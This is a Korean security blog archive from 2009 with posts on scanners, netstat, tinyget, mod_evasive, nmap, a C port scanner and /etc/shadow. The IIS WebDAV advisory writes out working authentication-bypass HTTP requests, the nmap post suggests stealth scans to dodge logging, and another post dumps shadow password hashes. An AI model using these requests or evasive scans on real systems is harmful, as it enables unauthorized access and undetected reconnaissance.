6. N-Stealth – N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.

http://www.nstalker.com/nstealth/

7. Solarwinds – Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely display all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.

http://www.solarwinds.net/

8. Achilles – The first publicly released general-purpose web application security assessment tool. Achilles acts as a HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com…OOPS!

http://www.mavensecurity.com/achilles/

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

http://foundstone.com/resources/proddesc/cookiedigger.htm

10. Netcat (The Network SwissArmy Knife) – Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

http://www.atstake.com/research/tools/network_utilities/
2009/07/31 21:54 2009/07/31 21:54
- MD5 체크썸을 계산해 준다.
- MD5 체크썸을 비교해 준다.
- 무설치 방식으로 작동된다.
2009/07/31 21:52 2009/07/31 21:52
최근 DDoS 관련 하여 여러가지 자료 수집을 하고  공부를 하다보니 여러가지 네트워크에 대하여 다시 보게 된다.

그중에서 우리가 흔히 시스템에서 네트워크 현황을 보려고 할때 주로 사용하는 'netstat' 명령어 중에서 -s 옵션을 알게 되었다..

그냥 지나치게 되는 옵션인데 내용을 보니 아주 많은 부분을 볼수 있는 옵션이다.  특히 DDoS에 대한 기술적 대응시에는 많은 참조가 되겠다.

[root@www ~]# netstat -s
Ip:
   7782 total packets received
   0 forwarded
   0 incoming packets discarded

   4317 incoming packets delivered
   3341 requests sent out
Icmp:
   353 ICMP messages received
   0 input ICMP message failed.
   ICMP input histogram:
       destination unreachable: 326
       echo requests: 27
   404 ICMP messages sent
   0 ICMP messages failed
   ICMP output histogram:
       destination unreachable: 377
       echo replies: 27
IcmpMsg:
       InType3: 326
       InType8: 27
       OutType0: 27
       OutType3: 377
Tcp:
   2 active connections openings
   29 passive connection openings
   1 failed connection attempts
   1 connection resets received
   1 connections established
   2098 segments received
   2086 segments send out
   2 segments retransmited
   0 bad segments received.
   250 resets sent
Udp:
   53 packets received
   377 packets to unknown port received.
   0 packet receive errors
   379 packets sent
TcpExt:
   1 resets received for embryonic SYN_RECV sockets
   2 TCP sockets finished time wait in fast timer
   90 delayed acks sent
   Quick ack mode was activated 2 times
   29 packets directly queued to recvmsg prequeue.
   2 packets directly received from prequeue
   248 packets header predicted
   459 acknowledgments not containing data received
   140 predicted acknowledgments
   1 congestion windows recovered after partial ack
   0 TCP data loss events
   2 other TCP timeouts
   2 DSACKs sent for old packets
   1 DSACKs received
IpExt:
   InMcastPkts: 975
   OutMcastPkts: 515
   InBcastPkts: 506
[root@www ~]#

패킷과 ICMP,TCP,UDP등 왠만한 프로토콜에 대한 패킷수라든지, 컨넥션수등을 알수 있다.  간단한 명령어와 옵션을 가지고도 많은 정보를 알수 있다.  참고 하기 바랍니다..
2009/07/31 21:50 2009/07/31 21:50

Windows 2008이 나오면서 액티브 디렉터리(Active Directory)의 위상이 바뀌고 있습니다. 과거 시스템의 대부분이 AD가 없어도 잘 동작하는 환경에서 나왔지만, 보안이 점차 중요해지면서 합법적인 권한을 부여 받기 위한 환경을 구성하기 위해 AD를 요구하는 프로그램들이 점차 늘어가고 있기 때문입니다. 물론, AD가 없는 환경에서도 잘 동작하는 프로그램도 많이 있지만, AD가 없어도 잘 동작하는 프로그램이라도 AD가 있으면 보다 더 짧은 작업 시간을 들여서 같은 효과를 낼 수 있습니다.

과거의 AD는 특정 응용 프로그램(예를 들면 익스체인지 같은..)을 동작하기 위해 필요했지만, 이제는 단순한 응용 프로그램의 동작을 넘어 다수의 시스템 통합에 사용됩니다. 점차적으로 시스템이 많아지고 복잡해지면서 직원이 작업에 필요한 부분에 접근하는 일이 많아지고 있습니다. 접근할 일이 많다는 것은 곧 허가를 받아야 한다는 것이고, 이런 작업은 생산성과 관련된 업무와는 거리가 있는 일입니다.

VPN 장비가 있다고 가정을 해봅시다. VPN에는 접근할 수 있는 사용자의 계정이 존재하며, 계정에 따라 접근할 수 있는 범위가 다릅니다. (1)VPN에 접근하기 위해서 사용자는 자신의 정보를 제공해야 합니다. VPN에 접근한 사용자는 회선만 연결한 상태이므로 자신이 쉽게 (2)작업을 할 수 있는 자신의 PC에 접속을 합니다. 그 후에 (3)자신이 원하는 자원이 있는 곳에 접근하기 위해서 자신의 정보를 입력해야 합니다. 보통 한 곳만 보면 모든 일이 해결되는 것이 아니므로 보통 서너번 더 정보를 입력해야 원하는 정보까지 접근할 수 있습니다. 이렇게 잦은 정보의 입력은 사용자에게 불편함을 가져오고, 시스템에는 과부하로, 그리고 보안상에서는 헛점으로 남습니다.

일반적인 회사에서 현실적으로 직원 한 명이 커버 가능한 서버의 댓수는 몇 대 일까요? 서버를 점검하는 가장 간단한 방법은 이벤트 뷰어를 보는 것이겠지요. 그러면 한번 단순한 계산을 해봅시다. 서버 1대를 점검하는데 걸리는 시간을 확인해봅시다.

시나리오 : AD 구축 없으며, 모두 다 독립된 실행인 환경

점검하기 위한 과정 :

  1. 원격 데스크톱 실행(5초)
  2. 로그인(10초)
  3. 이벤트 뷰어 3개(응용 프로그램, 시스템, 보안로그) 확인(각 20초)
  4. 로그오프(5초)

전체 소요시간은 5+10+5+(20x3)+5하여 85초가 소요됩니다. 오차를 위해 5초의 추가 시간을 주면 1분 30초라는 짧은 시간이 나옵니다. 그러면 서버가 늘어나면 어떻게 될까요?

위 과정은 서버의 증설에 따라 시간이 점차 늘어납니다. 위 표를 보면 서버가 100대가 되었을 때를 기준으로 보면, 전체 소요시간은 2시간 21분 40초로 나와있지만, 실제 원하는 작업인 이벤트 뷰어를 보는 시간은 1시간 40분 정도 밖에 되지 않습니다. 전체 작업 시간은 약 140분이지만, 실제 작업에 필요한 시간은 100분 정도입니다. 최종 작업을 위해 40분 정도를 낭비한 것입니다. 더구나 위의 표는 상당히 이상적인 시간을 기록한 것니까 실제 업무에서는 더 많은 시간이 소요됩니다.

그렇다면 AD를 적용하면 어떻게 될까요? 이벤트 뷰어를 하나 열고 컴퓨터에 접속을 하기만 하면 되고, 보다 귀찮으신 분이라면 이를 다 연결해둔 다음에 파일로 저장해 둔다면, 1번의 실행과 이벤트 뷰어의 확인 시간만 소요될 것입니다. 즉, 100대 기준으로 보면 1시간 40분+5초라는 시간이 걸립니다.

소규모인 경우에는 AD의 유지 비용이 있기 때문에 오히려 더 큰 손실을 입을 수 있습니다. 하지만, 같은 층에 같은 레벨에 컴퓨터가 다수 있다면, 이에 대한 효과적인 접근 방법 및 제어를 이루기 위한 방법으로 AD의 도입은 필수가 아닐까요? 물론 MOM과 같은 전문 모니터링 툴을 사용한다면, 이런 불편함은 없겠지만 말이죠.

출처: http://www.ntfaq.co.kr/4326

2009/07/27 18:45 2009/07/27 18:45

Windows Server 2003 Resource Kit에는 tinyget이라는 외부 명령어가 있다. tinyget은 명령줄 기반의 HTTP 클라이언트로 웹 브라우징에 사용하기 위한 용도로 제공되는 것이 아니라 디버깅 및 단순 스트레스 테스트를 위해서 사용할 수 있는 프로그램이다.

tinyget을 실행해보면 복잡한 옵션이 있지만, 복잡한 옵션 중에서 화면에 결과물을 보기위한 기본적인 사용법은 다음과 같이 하면 된다.

기본 사용법 : tinyget –srv:[DOMAIN or IP] –uri:[PAHT] –[D or T or H]

예를 들어, www.ntfaq.co.kr 사이트의 결과를 보고 싶다면 다음과 같이 명령어를 사용하면 된다.

C:\> tinyget –srv:www.ntfaq.co.kr –uri:/ –d

 위의 예제에 쓰인 옵션을 설명하면 다음과 같다.

  • srv : 서버에 접속할 주소로 파일 명까지 포함한 것이 아니라 도메인 명이나 IP만 써야 한다.
  • uri : 접속할 경로 및 페이지와 파라메터. 예제에서는 /를 지정하였으므로 기본 페이지를 지정함. 특정 파일 경로와 파일 지정할 때에는 /대신에 다음과 같이 입력하면 된다. /guestbook?page=2
  • d : 데이터를 보여 준다. h는 헤더를 보여주며, t를 사용할 시에는 주고 보낸 모든 응답을 보여준다.

 하지만, 서버 앞에 L4같은 로드벨런서 장비가 있는 경우에는 원하는 결과를 얻을 수 없다. 예를 들면, tinyget –srv:www.ntfaq.co.kr –uri:/ –d 는 정상적인 NTFAQ Korea 사이트로 표기되지만, tinyget –srv:211.172.252.15 –uri:/ –d 는 원하는 결과가 아니다. 이러한 차이는 호스트 헤더를 통해 웹서비스를 구분하기 때문인데, tinyget에는 –rh(-reqheaders) 를 이용하여 다음과 같이 지정할 수 있다.

C:\> tinyget -srv:211.172.252.15 -uri:/ -d -rh:"Host: www.ntfaq.co.kr\r\n"

-d 옵션을 사용하는 경우, 결과물을 눈으로 보기란 힘들기 때문에 -h를 사용해서 간략화 시키는 방안도 좋지만,

C:\> tinyget -srv:211.172.252.15 -uri:/ -h -rh:"Host: www.ntfaq.co.kr\r\n"

보다 깔끔하게 하기 위해서는 정상일 때 결과값을 지정해두고 오류가 났을 때만 보이도록 설정하는 게 더 깔끔하다.

C:\> tinyget -srv:211.172.252.15 -uri:/ -rh:"Host: www.ntfaq.co.kr\r\n" -status:200

헤더값 체크로 만족스럽지 않다면, 아예 본문에 오류 문자열이 있는지 확인하는 것도 좋다

C:\> tinyget -srv:211.172.252.15 -uri:/ -rh:"Host: www.ntfaq.co.kr\r\n" -testnotcontainstring:장애

 이렇게 다양한 옵션을 통해 원하는 결과를 얻을 수 있지만, 이 결과를 어떻게 효과적으로 모니터링할 것인지는 관리자의 몫으로 남겨두겠다.

 tinyget을 모니터링 이외에 사용하는 또 하나의 좋은 방안은 ASP.NET이나 JSP로 된 사이트의 경우 접속자가 매우 적거나 시스템을 재부팅한 경우, 첫번째 접속자는 컴파일이 되기 전이므로 컴파일 완료시까지 오류를 만나기 쉬운데 이를 막고자 하는 용도로도 사용하기에 적합하다는 점이다.

출처 : http://www.ntfaq.co.kr/4314

2009/07/27 18:44 2009/07/27 18:44
기업에 웹서버 관리하는 분들이라면 중국발 해킹 관련해서 한번씩은 들어보거나 당행본 분들이 많을 것입니다. 그 만큼 아주 다양하게 접근해서 괴롭히고 있다고 봐도 과언이 아닙니다.

지난 27일 서울 잠실롯데호텔에서 개최된 '정보보호심포지엄(SIS) 2007' 행사의 일환으로 개최된 해킹시연을 했다고 합니다. 관련해서 '중국발 해킹, 마술의 경지?' 기사가 나서 소개올려 드립니다.

신문기사 앞부분에는  "해킹당하지도 않았는데 정상적인 웹사이트에서 악성코드가 유포된다?" 어찌보면 마술과도 같은 해킹. 그러나 실제 국내 이용자들을 표적으로 은밀히 진행되고 있는 공격이다.
라고 할정도로 표현을 할 정도로 현재의 해킹 툴은 대단하다는것을 알려 준다.
결국 외부에 취약점을 오픈을 최소화 하려는 대안을 만들지 않는 한 오픈된 웹 서버에게는 결코 안정하지 못하다는 것을 알 수 있습니다.
공격자가 자신의 PC에 웹사이트의 취약점을 찾아 이를 해킹할 수 있는 자동 공격 프로그램 화면을 띄운다. 공격자가 취약점 탐색 버튼을 클릭하자 보안이 취약한 웹서버들이 줄줄이 걸려든다.

이 중 한곳을 타깃으로 공격자가 공격명령을 실행하자 해당 웹서버의 관리자 권한이 장악됐다. 한순간이었다. 공격자는 원격접속 프로그램을 해당 웹서버에 설치하면 눈앞의 모니터 화면으로 마치 자신의 PC처럼 통제가 가능한 상황.

이후 공격자가 사용한 공격 방식은 'ARP 스푸핑(Spoofing)'. ARP란 IP 네트워상에서 IP 주소를 물리적 네트워크(장비) 주소로 대응시키기 위한 프로토콜로, 이를 조작하면 동일한 네트워크를 물려있는 다른 웹서버나 PC의 모든 이동중인 데이터 패킷을 볼 수 있게 된다.

공격자는 이 공격을 통해 같은 네트워크에 물려있는 모든 웹사이트(웹서버)의 방문자들을 상대로 개인정보를 빼내는 악성코드가 자동으로 유포되도록 조작했다. 이 경우, 사용자가 다른 정상적인 웹서버에 접속해도 이용자PC에 전송되는 데이터는 모두 이곳을 경유해 공격자가 미리 숨겨놓은 악성코드를 받아가게되는 것이다.

현재 많은 IDC 제공되는 웹서버들의 실제 담당자가 알고 있지 못하는 유형의 웹사이트를 해킹해 악성코드를 숨겨놓거나 중개서버로 악용되는 이른바 '중국발 해킹'이 여전히 기승을 부리고 있다고 볼 수 있습니다.

또한, 더욱이 IDC나 웹호스팅업체의 경우, 한곳의 웹서버가 뚫리면 그곳에 입주한 모든 웹서버들이 이같은 악성코드 유포 위협에 노출될 수 있다는 점에서 충격적이며 관련해서 기업체에서 준비해야 할 사항이 매우 미비하다는 것이 더 걱정된 부분입니다.

특히 이런 모든 취약점과 해킹 공격을 막는 다는 것은 기업의 보안담당자나 엔지니어가 해야 할 부분이 매우 미비할 수도 있다는 것입니다.

◆패치 상업화 경향…반드시 설치해야 = 확인된 공격 방법에 대한 패치 평균개발 기간은 6.8일로 지난해 상반기와 비교했을 때 약 하루 정도 더 늘어났다. 시만텍 측은 이 같은 패치 개발 지연 경향이 '패치 상업화'에 따른 것으로 보고 있다. 그러나 시만텍 관계자는 "웹서버나 데스크톱에 새로 설치한 운영체제를 감염시키는데 걸리는 시간을 분석해 본 결과 패치를 설치한 PC는 모든 종류의 운영체제에서 감염 문제가 없었다"며 "운영시스템 및 애플리케이션 패치를 하지 않으면 감염 치료-재감염의 악순환이 계속될 수밖에 없다"고 설명했다.

◆올해 보안 위협 어떤 변화 있나 =시 만텍은 사용자가 눈치채지 못하게 은밀한 공격을 실행하는 악성 코드가 증가할 것으로 예상했다. 또 ▲상업화된 취약점 연구가 증가하고, ▲비전통적인 플랫폼(휴대전화, PDA, 맥OSX 등)에 대한 공격이 늘어나며, ▲인스턴트 메시징을 통해 피싱이나 악성 코드의 배포가 급증할 것으로 내다봤다.

자료출처 : '중국발 해킹' 올바로 대처하라

2009/07/27 18:41 2009/07/27 18:41

최근 이 취약점을 이용하여 IIS 웹서버를 공격하는 사례가 발생하고 있습니다. 아직 패치가 발표되지 않은 만큼, WebDAV의 기능을 중지시켜 미연에 방지하시기 바랍니다.

5월 18일 오늘(미국 기준), IIS 5/6의 WebDAV에서 보안 인증을 우회하는 취약점이 발견되었습니다.

보안에 관심을 가지고 계신 분이라면 WebDAV 취약점은 지난 2001년도에 IIS 4/5에서 발생한 MS01-26이 생각날 수도 있습니다. 이는 폴더 이름에 사용되는 문자에 유니코드로 인코딩하는 것을 지원하면서 발생한 것으로 가장 대표적인 것이 "../.."을 "..%c0%af.."로 인코딩하게 되면 보안 권한 검사를 거치지 않고 곧바로 파일에 액세스할 수 있게 된 문제점입니다.

하여튼, 이 번에 새로 발견된 WebDAV 취약점을 통해 공격자는 비밀번호로 잠근 디렉터리를 액세스하거나 파일을 다운로드 또는 업로드할 수 있습니다. Nicolas Rangos에 따르면 WebDAV의 작업 폴더가 아닌 IIS 전체의 폴더에 취약점이 노출되어 있다고 합니다. 원인은 유니코드 문제를 처리하는 과정에서 발생한다고 합니다.

아래와 같이 비밀번호로 보호되는 폴더의 파일을 GET 명령어를 통해 요청을 하게 되면 인증을 거치치 않고 접근이 가능하게 됩니다.

GET /..%c0%af/protected/protected.zip HTTP/1.1Translate: fConnection: closeHost: servername

"/" 문자는 %c0%af 라는 유니코드 값으로 인코딩되어 /protected/protected.zip 파일에 접근할 수 있게 됩니다. 또한, Translate:f 옵션을 통해 WebDAV의 기능으로 디렉터리를 접글할 수 있습니다.

또한 WebDAV 폴더에 대한 공격은 약간 더 복잡하지만 다음과 같은 방법으로 업로드나 다운로드가 가능합니다.

PROPFIND /protec%c0%afted/ HTTP/1.1Host: servernameUser-Agent: neo/0.12.2Connection: TETE: trailersDepth: 1Content-Length: 288Content-Type: application/xml<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>


다행인 점은 일부 IIS 7에서는 WebDAV에 관련된 취약점이 발생하지 않는 다는 것입니다.

아직 이 문제점에 대한 해결책은 나와 있지 않지만 가장 좋은 방법은 WebDAV를 일시적으로 중지하는 것입니다.

자료출처: http://secunia.com/advisories/35109/
MS 자료: http://www.microsoft.com/technet/security/advisory/971492.mspx

2009/07/27 18:38 2009/07/27 18:38

os Sulinux 1.5


Dos공격 방어 (mod_evasive) 설치

# wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz

 
# tar xvzf mod_evasive_1.10.1.tar.gz
# cd mod_evasive
# /usr/local/apache/bin/apxs -iac mod_evasive20.c

http.conf

<ifModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 3
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 30
</IfModule>


dos 차단 테스트

[root@mail mod_evasive]# perl test.pl
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
..생략...


# cd /tmp

# ls -al | grep 127.0.0.1
-rw-r--r--   1 nobody 4294967295    6  3월 13 14:04 dos-127.0.0.1


위와 같이 test.pl 실행하면 HTTP/1.1 403 Forbidden 메세지를 보여주고 접속 차단
/tmp에 저장 127.0.0.1 에서 DOS 공격이 차단 됐다는
dos-127.0.0.1파일이 생성 됐다는것이다


두번째방법으로 웹에서 새로고침 누르면
처음에 접속이 됐다가 두번째는 접속이 불가능

인가된 IP주소 할당

DOSWhitelist 127.0.0.1
DOSWhitelist 127.*.*.*

와일드카드(*)는 필요하다면 최대 xxx.*.*.* 까지 사용할 수 있다.

2009/07/27 18:26 2009/07/27 18:26
최근 Milw0rm 사이트에 다양한  유형의 MSSQL Injection 공격 기법에 대해서 설명해 놓은 페이퍼가 올라왔습니다. 보기 드물만큼 아주 좋은 페이퍼여서 TXT파일을 PDF로 변환하여 올립니다.

다음은 페이퍼 목차입니다.


|=--------------------------------------------------------------------=|
|=----------------=[  Full MSSQL Injection PWNage  ]=-----------------=|
|=-----------------------=[ 28 January 2009 ]=------------------------=|
|=---------------------=[  By CWH Underground  ]=---------------------=|
|=--------------------------------------------------------------------=|


######
Info
######

Title : Full MSSQL Injection PWNage
Author : ZeQ3uL && JabAv0C
Team    : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-01-28


##########
Contents
##########

  [0x00] - Introduction

  [0x01] - Know the Basic of SQL injection

[0x01a] - Introduction to SQL Injection Attack
[0x01b] - How to Test sites that are Vulnerable in SQL Injection
[0x01c] - Bypass Authentication with SQL Injection
[0x01d] - Audit Log Evasion
[0x01e] - (Perl Script) SQL-Google searching vulnerable sites

  [0x02] - MSSQL Normal SQL Injection Attack

[0x02a] - ODBC Error Message Attack with "HAVING" and "GROUP BY"
[0x02b] - ODBC Error Message Attack with "CONVERT"
[0x02c] - MSSQL Injection with UNION Attack
[0x02d] - MSSQL Injection in Web Services (SOAP Injection)

  [0x03] - MSSQL Blind SQL Injection Attack

[0x03a] - How to Test sites that are Vulnerable in Blind SQL Injection
[0x03b] - Determine data through Blind SQL Injection
[0x03c] - Exploit Query for get Table name
[0x03d] - Exploit Query for get Column name

  [0x04] - More Dangerous SQL Injection Attack

[0x04a] - Dangerous from Extended Stored Procedures
[0x04b] - Advanced SQL Injection Techniques
[0x04c] - Mass MSSQL Injection Worms

  [0x05] - MSSQL Injection Cheat Sheet

  [0x06] - SQL Injection Countermeasures

  [0x07] - References

  [0x08] - Greetz To

2009/07/16 19:59 2009/07/16 19:59

진짜 희안하네요.ㅎㅎ 아직도 약간에 꽁수를 쓰면 알약/에서 안걸린다는 제길 ~~


2009/06/18 17:54 2009/06/18 17:54
NMAP은 port Scanning 툴로서 호스트나 네트워크를 스캐닝 할 때, 아주 유용한 시스템 보안툴인 동시에, 해커에게는 강력한 해킹툴로 사용될 수 있습니다.

서버를 운영하다 보면 관리자 스스로도 어떤 포트가 열려있고, 또 어떤 서비스가 제공중인지 잘
모를때가 있습니다. 기억력이 나빠서나, 게을러서가 아니라 필요에 의해 자주 변경되므로 수시로
파악해서 기록해두지 않으면 잊어버리게 됩니다. 또 크래킹에 의해 생성된 백도어는 파악하기가
어렵습니다.

수 많은 포트와 서비스를 효과적으로 체크해서 관리하기 위해서 NMAP과 같은 포트 스캔 툴이
필요합니다.
NMAP은 기존의 포트스캔툴에 비해 다양한 옵션과 방화벽 안쪽의 네트웍도 스캔할 수 있는 강력한
기능이 있습니다.

1. 설치

http://www.insecure.org/nmap

nmap 의 홈페이지에서 소스파일을 내려 받습니다. 그 후에 설치할 디렉토리로 옮긴후에 압축을
풉니다. 그 후에 해당 디렉토리에서 ./configure 를 실행한 후에make, make install 을 실행합니다.


[root@gyn nmap-2.54BETA30]# ./configure
[root@gyn nmap-2.54BETA30]# make; make install

설치가 끝났으면 몇 가지 스캔 타입을 알아봅시당.

-sT 일반적인 TCP 포트스캐닝.
-sS 이른바 'half-open' 스캔으로 추적이 어렵다.
-sP ping 을 이용한 일반적인 스캔.
-sU UDP 포트 스캐닝.
-PO 대상 호스트에 대한 ping 응답을 요청하지 않음 .
log 기록과 filtering 을 피할 수 있다.
-PT 일반적이 ICMP ping이 아닌 ACK 패킷으로 ping 을 보내고
RST 패킷으로 응답을 받는다.
-PI 일반적인 ICMP ping 으로 방화벽이나 필터링에 의해 걸러진다.
-PB ping 을 할 때 ICMP ping 과 TCP ping을 동시에 이용한다.
-PS ping 을 할 때 ACK 패킷대신 SYN 패킷을 보내 스캔.
-O 대상 호스트의 OS 판별.
-p 대상 호스트의 특정 포트를 스캔하거나, 스캔할 포트의 범위를 지정.
ex) -p 1-1024
-D Decoy 기능으로 대상 호스트에게 스캔을 실행한 호스트의 주소를 속인다.
-F /etc/services 파일 내에 기술된 포트만 스캔.
-I TCP 프로세서의 identd 정보를 가져온다.
-n IP 주소를 DNS 호스트명으로 바꾸지 않는다. 속도가 빠르다.
-R IP 주소를 DNS 호스트명으로 바꿔서 스캔. 속도가 느리다.
-o 스캔 결과를 택스트 파일로 저장.
-i 스캔 대상 호스트의 정보를 지정한 파일에서 읽어서 스캔.
-h 도움말 보기

위의 스캔타입은 자주 쓰이는 내용이고 -h 옵션을 쓰거나 man page를 이용하면 아주 상세한
사용방법을 보실 수 있습니다.


[gyn@gyn gyn]$ man nmap
NMAP(1) NMAP(1)

NAME
nmap - Network exploration tool and security scanner

SYNOPSIS
nmap [Scan Type(s)] [Options] <host or net #1 ... [#N]>

..중략..

[gyn@gyn gyn]$ nmap -h
Nmap V. 2.54BETA30 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
-sT TCP connect() port scan (default)
* -sS TCP SYN stealth port scan (best all-around TCP scan)
* -sU UDP port scan

..중략..


2. 사용.

몇가지 사용 예를 통해 nmap을 활용해 보시죠.


[root@gyn root]# nmap -sP xxx.xxx.xxx.xxx

Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/ )
Host gyn (xxx.xxx.xxx.xxx) appears to be up.

Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds

-sP 옵션으로 대상호스트가 살아 있음을 알아냈습니다. 이젠 특정 포트(80)를 검색해 보겠습니다.

[root@ home]# nmap -sP -PT80 xxx.xxx.xxx.xxx
TCP probe port is 80

Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )
Host (xxx.xxx.xxx.xxx) appears to be up.
Nmap run completed -- 1 IP address (1 host up) scanned in 1 second

지정된 포트가 아니라 대상호스트의 열린 포트를 모두 검색해 봅니다.


[root@ home]# nmap -sT xxx.xxx.xxx.xxx

Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )
Interesting ports on (xxx.xxx.xxx.xxx):
(The 1526 ports scanned but not shown below are in state: closed)
Port State Service
22/tcp open ssh
53/tcp open domain
80/tcp open http
Nmap run completed -- 1 IP address (1 host up) scanned in 5 seconds

대상 호스트의 열린 포트를 알수는 있지만 로그가 남으므로 위험합니다.
스텔스 스캔으로 감시를 피해야 겠지요.

[root@webserver log]# nmap -sS xxx.xxx.xxx.xxx

Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )
Interesting ports on (xxx.xxx.xxx.xxx):
(The 1526 ports scanned but not shown below are in state: closed)
Port State Service
22/tcp open ssh
53/tcp open domain
80/tcp open http

Nmap run completed -- 1 IP address (1 host up) scanned in 5 seconds

UDP port 스캔입니다. 시간이 많이 걸릴 수도 있습니다.


[root@gyn root]# nmap -sU localhost

Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/ )
Interesting ports on gyn (127.0.0.1):
(The 1450 ports scanned but not shown below are in state: closed)
Port State Service
53/udp open domain
699/udp open unknown

Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds

이번에는 -O 옵션으로 운영체제를 알아보겠습니다.


[root@webserver /root]# nmap -sS -O xxx.xxx.xxx.xxx

Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )
Interesting ports on db (xxx.xxx.xxx.xxx):
(The 1530 ports scanned but not shown below are in state: closed)
Port State Service
22/tcp open ssh
113/tcp open auth
3306/tcp open mysql

TCP Sequence Prediction: Class=random positive increments
Difficulty=2158992 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.16

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds

몇가지 예를 통해 사용법을 알아 보았습니다.

마지막을 부탁드릴 말씀은 자신이 직접 관리하지 않는, 호스트나 네트웍에서 테스트를 하는 것은
아주 무례한 행동이며, 관리가 엄격한 사이트의 경우 접속 제한은 당하는 경우도 있으므로
바람직하지 않은 방법으로 사용하는 일이 없길 바랍니다.

2009/06/18 17:42 2009/06/18 17:42
이거보다 짧은거 있으면..

#include
#include
#include
#include
#include
#include
#include

int port_scan(char *hostaddr, int cport);
int main(int argc, char *argv[])
{
int cport; // 포트 루프용 변수
if (argc < 2) {
printf("사용 방법 : ./portscan 호스트 IP ");
exit(1);
}
// 1부터 1023번 포트까지 체크 반복합니다.
for (cport = 1;cport < 1024;cport++) {
if (port_scan(argv[1], cport) == 0) {
printf("%5d open ", cport);
}
}
return 0;
}
int port_scan(char *hostaddr, int cport)
{
int sockfd; // 소켓 기술자
struct sockaddr_in destaddr; // 소켓 주소 구조체
int pok;
// 소켓 기술자 초기화
sockfd = socket(AF_INET, SOCK_STREAM, 0);
destaddr.sin_family = AF_INET;
destaddr.sin_addr.s_addr = inet_addr(hostaddr);
destaddr.sin_port = htons(cport);
bzero(&(destaddr.sin_zero), 8);

pok = connect(sockfd, (struct sockaddr *)&destaddr, sizeof(struct sockaddr));
close(sockfd);
// 연결 되면 0을, 아니면 -1을 리턴
if (pok == -1)
return -1;
return 0;
}
컴파일 할땐..: # gcc -o portscan portscan.c

실행 할시..: # ./portscan 호스트 IP
2009/06/18 17:39 2009/06/18 17:39
이는 root의 권한으로 수행되어야 함을 미리 알립니다.

보통 리눅스 시스템에서는 /etc/passwd 파일에 password를 저장했습니다.
하지만, 누구나 읽을 수 있는 /etc/passwd 파일은 해킹의 대상이 되었죠.
따라서, 리눅스 시스템은 /etc/shadow 라는 파일에 암호를 따로 저장합니다.

[root@xxx root]# ls -al /etc/passwd /etc/shadow
-rw-r--r--    1 root     root         2694  5월  9 14:29 /etc/passwd
-r--------    1 root     root         2024  5월  9 14:29 /etc/shadow
[root@xxx root]#

위에 보시면, passwd 파일은 other가 읽을 수 있는 권한이 있음이 보입니다.
하지만, shadow 파일은 root만이 읽을 수 있습니다. 또한, root는 수정도 할수 없지요.

중요한건 root는 읽을 수는 있다는 겁니다. 안그러면 아무 의미가 없겠죠?
아무도 로그인을 못할테니. 아무튼, 중요한건 그게 아니니까...

[root@xxx root]# cat /etc/shadow
....
test1:$1$dxH.pxpU$CpTS86RilpP5xo4igbv88/:12818:0:99991:77:::
test2:$1$ANn54aHO$GALmkrq.xUlCOb2XCNAO2/:12820:0:99991:77:::
....

위에 처럼 실행하면 해당 계정에 대한 암호화된 passwd가 보입니다.
(참고로, 위의 계정은 임의로 수정한겁니다. 크랙해도 머... 의미가... ㅋㅋ)

